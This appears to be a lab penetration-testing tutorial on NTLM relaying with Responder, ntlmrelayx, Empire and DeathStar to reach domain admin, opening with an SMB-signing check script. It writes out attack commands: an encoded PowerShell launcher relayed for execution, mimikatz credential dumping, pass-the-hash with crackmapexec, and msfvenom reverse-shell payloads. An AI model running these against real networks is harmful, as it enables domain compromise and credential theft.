Automating the Pentesting Process: Using NTLM Relaying & Deathstar to get Domain Admin

What I’m using:

Responder

Empire

Deathstar

Ntlmrelayx.py (Install Guide here)

Operating Systems

Host: Ubuntu 16.04, Kali Linux (Latest)

Target 1: Windows Server 2008 R2 (Dummy server)

Target 2: Windows Server 2008 R2 (Domain Controller)

In a domain, it's not uncommon to capture NTLMv2 challenge/response pairs (Net-NTLMv2) in some way while doing a penetration test. The problem is that a Net-NTLMv2 response cannot be passed the way a plain NT hash can, because it is an HMAC over a one-time server challenge rather than a reusable credential. If your dictionary isn't good, or the domain enforces a strict password policy with numbers and special characters, you'll be sitting with a Net-NTLMv2 hash and a username and nothing to do with them. However, there is the option of relaying that authentication to another host instead of cracking it. The nasty thing about this is that NTLM relaying can lead to remote code execution if the relayed account has local administrator rights on the target Windows server (that is what writing to ADMIN$ and creating a service require). What gets even worse is that there are a few tools that automate the entire damn thing.

Now before I get started there’s a few things I’d like to clarify.

  1. I have to use Ubuntu for Deathstar because Deathstar will not work with the current version of Kali: the Python requests module won't negotiate any version of TLS lower than 1.2.
  2. The first part of this process assumes that NTLM relaying is possible; if the target requires SMB signing, this entire operation is dead in the water. Signing is required by default on domain controllers but not on workstations and member servers, so that's good/bad depending on your perspective. Deathstar needs an Empire agent to work, so if you can get that agent on a machine by any means possible, Deathstar will do its stuff. It doesn't NEED NTLM relaying; this is just an interesting way of getting an Empire agent.
  3. I'm doing this on my lab network, not someone else's. This demo simulates what can happen if LLMNR spoofing is possible and a domain admin's credentials are captured. It is a very limited demo of what Deathstar & Crackmapexec can do, and I encourage you to read about their capabilities here.
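Since point 2 is the one that decides whether any of this works, here is an added example (my own script, not part of Deathstar, ntlmrelayx or the setup below) that asks a host directly whether it requires SMB signing before you put it in the `-t`/`-tf` list. It sends a single SMB2 NEGOTIATE offering dialects 2.0.2 through 3.0.2 and reads the SecurityMode flags out of the response, which is the same field crackmapexec looks at when it builds a relay list. Hosts that only speak SMB1 will not answer this probe. The target IP in the `__main__` block is the one from this post and is just a default argument.

```python
import socket
import struct
import sys
import uuid

SIGNING_ENABLED = 0x0001   # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002  # SMB2_NEGOTIATE_SIGNING_REQUIRED: relay over SMB will fail


def build_negotiate_request() -> bytes:
    """NetBIOS session header + 64-byte SMB2 header + 44-byte NEGOTIATE body (MS-SMB2 2.2.3)."""
    header = struct.pack(
        "<4sHHIHHIIQIIQ16s",
        b"\xfeSMB", 64, 0, 0,   # ProtocolId, StructureSize, CreditCharge, Status
        0, 1, 0, 0,             # Command=NEGOTIATE, CreditRequest, Flags, NextCommand
        0, 0, 0, 0,             # MessageId, Reserved, TreeId, SessionId
        b"\x00" * 16,           # Signature (unsigned)
    )
    dialects = (0x0202, 0x0210, 0x0300, 0x0302)
    body = struct.pack(
        "<HHHHI16sQ",
        36, len(dialects),       # StructureSize (always 36), DialectCount
        SIGNING_ENABLED, 0, 0,   # SecurityMode (we can sign), Reserved, Capabilities
        uuid.uuid4().bytes, 0,   # ClientGuid, ClientStartTime (no 3.1.1 contexts)
    ) + struct.pack("<%dH" % len(dialects), *dialects)
    smb = header + body
    return struct.pack(">I", len(smb)) + smb  # NetBIOS: message type 0x00 + 24-bit length


def parse_security_mode(packet: bytes) -> int:
    """SecurityMode from a NetBIOS-framed SMB2 NEGOTIATE response (MS-SMB2 2.2.4)."""
    if len(packet) < 4 + 64 + 4 or packet[4:8] != b"\xfeSMB":
        raise ValueError("not an SMB2 response (SMB1-only host?)")
    status, command = struct.unpack_from("<IH", packet, 4 + 8)
    if command != 0 or status != 0:
        raise ValueError("unexpected command 0x%x / status 0x%08x" % (command, status))
    struct_size, security_mode = struct.unpack_from("<HH", packet, 4 + 64)
    if struct_size != 65:
        raise ValueError("bad NEGOTIATE response StructureSize %d" % struct_size)
    return security_mode


def describe(security_mode: int) -> str:
    if security_mode & SIGNING_REQUIRED:
        return "signing REQUIRED: not a relay target"
    if security_mode & SIGNING_ENABLED:
        return "signing enabled but not required: relayable"
    return "signing disabled: relayable"


def _recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-response")
        buf += chunk
    return buf


def probe(host: str, port: int = 445, timeout: float = 3.0) -> int:
    """Live check against one host; returns its SecurityMode."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        nb = _recv_exact(s, 4)
        length = struct.unpack(">I", nb)[0] & 0x00FFFFFF
        return parse_security_mode(nb + _recv_exact(s, length))


def sample_response(security_mode: int) -> bytes:
    """Constructed NEGOTIATE response (SMB 2.1, flags SERVER_TO_REDIR) for offline testing; not a capture."""
    header = b"\xfeSMB" + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0) + b"\x00" * 16
    body = struct.pack("<HHH", 65, security_mode, 0x0210) + b"\x00" * (65 - 6)
    smb = header + body
    return struct.pack(">I", len(smb)) + smb


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.232.100"  # the target IP used in this post
    print(target, describe(probe(target)))
```

Run it as `python3 smbsign.py <ip>` against each candidate; anything that comes back "signing REQUIRED" (every domain controller by default) stays out of the ntlmrelayx target file, and the rest is what the relay below can actually land on.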

Without further ado:

I first start up the RESTful API for Empire in one terminal.

sudo python empire --rest --username empireadmin --password Password123

Then I start up Deathstar in another.

sudo ./DeathStar.py --listener-ip 192.168.232.133 -t 100

The listener IP will be whatever IP Empire is listening on. `-t 100` means I'm giving it 100 threads to run, so it's faster.

Next, I generate the PowerShell launcher from Empire. To do this, go to the listeners menu in Empire by typing

listeners


From here, I create the payload by using the command

launcher powershell Deathstar


Copy the PowerShell launcher, as you'll paste it into ntlmrelayx.py in a minute.

Next, I set up ntlmrelayx.py (Guide to set up NTLMRelayx.py here)

sudo ntlmrelayx.py -t 192.168.232.100 -c 'powershell -noP -sta -w 1 -enc [powershell code]'


ntlmrelayx.py also supports a file of targets with the `-tf` switch, so you can put in multiple targets if you want. Keep in mind that the PowerShell command must be in quotes or else it won't run.

Next, edit the Responder.conf file in the Responder repository and turn off the SMB and HTTP servers, so that ntlmrelayx.py can bind ports 445 and 80 itself and Responder only does the poisoning.


Finally, start up Responder

sudo python Responder.py -I ens33 -r -d -v


My screen then looks like this once it’s all set up.


Next, using my Windows machine, I simulate the domain admin mistyping a share name, which generates an LLMNR request.


The poisoned answer is then sent by Responder.


The NTLMv2 authentication is relayed by ntlmrelayx.py to the target.


Empire agent opened


Deathstar automatically starts doing its thing


Deathstar, for this demo, took about 5 minutes to find the domain controller, its active users, then spawn another Empire agent on the domain controller.


An Empire agent is now running on the DC


The final step is to get a shell.

There are many ways to do this:

  1. Upload a meterpreter payload in the form of a .exe and execute it via the shell command
  2. Use mimikatz to get the credentials on the server and use crackmapexec to pass the hash and open a meterpreter session
  3. Use Empire’s Invoke-Shellcode module
  4. Many more; research it.


Using Mimikatz & Crackmapexec to open Meterpreter Shell

First, interact with the agent. Always use the agent running with SYSTEM privileges: while user "god" is a domain admin, SYSTEM is still a higher privilege on the box, and dumping credentials out of LSASS with mimikatz is most reliable from there.

interact [agent name]


Then run mimikatz

mimikatz


After a minute it'll spit out a ton of info. Ignore it by pressing Enter and then typing

creds

and a nice table is shown.


As you can see, it found the hashes and the plain-text password of the domain administrator. From here, we can use crackmapexec to open a reverse shell.

First, set up multi/handler in Metasploit with the same LHOST and LPORT you'll give crackmapexec.

Then run crackmapexec. Even though I have the password in plain text, I'm using the NT hash here to show that pass-the-hash is possible.

crackmapexec 192.168.232.100 -u god -H 7314885dc066c5fd98e6ae96832fa905 -M metinject -o LHOST=192.168.232.136 LPORT=4443


Uploading a Meterpreter Payload via Empire

First, create a Meterpreter payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.136 LPORT=4443 -f exe > shell.exe


Copy the .exe into the Empire directory


Interact with the agent in Empire

interact [Agent name]

Upload and execute the .exe


Grats on shell


There are many, many more ways to get from an agent to a shell, but these are two of the easiest. Uploading an executable is not the stealthiest and is probably the least recommended, but a shell is a shell.


Extra Resources and credit for Deathstar & Crackmapexec:

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
